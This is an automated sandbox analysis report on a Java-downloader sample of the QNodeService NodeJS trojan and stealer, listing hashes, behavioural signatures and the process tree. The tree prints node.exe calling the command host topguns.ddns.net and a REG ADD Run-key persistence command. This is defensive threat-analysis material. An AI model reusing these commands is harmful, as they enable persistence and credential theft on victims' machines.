Analysis
-
max time kernel
140s -
max time network
143s -
platform
windows10_x64 -
resource
win10 -
submitted
23-10-2020 14:48
Static task
static1
Behavioral task
behavioral1
Sample
Parcel Delivery Note.jar
Resource
win7
Behavioral task
behavioral2
Sample
Parcel Delivery Note.jar
Resource
win10
General
-
Target
Parcel Delivery Note.jar
-
Size
77KB
-
MD5
0d96c82bc640a7304649e294a69b9263
-
SHA1
2a611f879a6e4fa4bf7997392b8735ff6d752c1e
-
SHA256
2a668c8e9f7e67de0b3bb60b71eb701884c98545d2e5b87e4aa97272847bb563
-
SHA512
487a6b6c4142d154030b26a25a8ae43876f7cde9de3465bae3ab95de00920e958c2ff78e6923cca35e9e06dbf1731f980e039bcb26553a4e950f8e621f1be6ed
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 2872 node.exe 3508 node.exe 1684 node.exe -
Loads dropped DLL 6 IoCs
pid Process 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2627584638-3284755310-3019450177-1000\Software\Microsoft\Windows\CurrentVersion\Run\b5e57052-91ea-4f36-bc1e-e1f4b566b61c = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ab66-174.dat js behavioral2/files/0x000100000001ab66-178.dat js behavioral2/files/0x000100000001ab66-182.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 wtfismyip.com 23 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 2872 node.exe 2872 node.exe 2872 node.exe 2872 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe 1684 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3996 wrote to memory of 812 3996 java.exe 75 PID 3996 wrote to memory of 812 3996 java.exe 75 PID 812 wrote to memory of 2872 812 javaw.exe 76 PID 812 wrote to memory of 2872 812 javaw.exe 76 PID 2872 wrote to memory of 3508 2872 node.exe 78 PID 2872 wrote to memory of 3508 2872 node.exe 78 PID 3508 wrote to memory of 1684 3508 node.exe 79 PID 3508 wrote to memory of 1684 3508 node.exe 79 PID 1684 wrote to memory of 1076 1684 node.exe 81 PID 1684 wrote to memory of 1076 1684 node.exe 81 PID 1076 wrote to memory of 632 1076 cmd.exe 82 PID 1076 wrote to memory of 632 1076 cmd.exe 82
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Parcel Delivery Note.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\e95b14f5.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain topguns.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rN7cuj\boot.js --hub-domain topguns.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_rN7cuj\boot.js --hub-domain topguns.ddns.net5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b5e57052-91ea-4f36-bc1e-e1f4b566b61c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "b5e57052-91ea-4f36-bc1e-e1f4b566b61c" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:632
-
-
-
-
-
-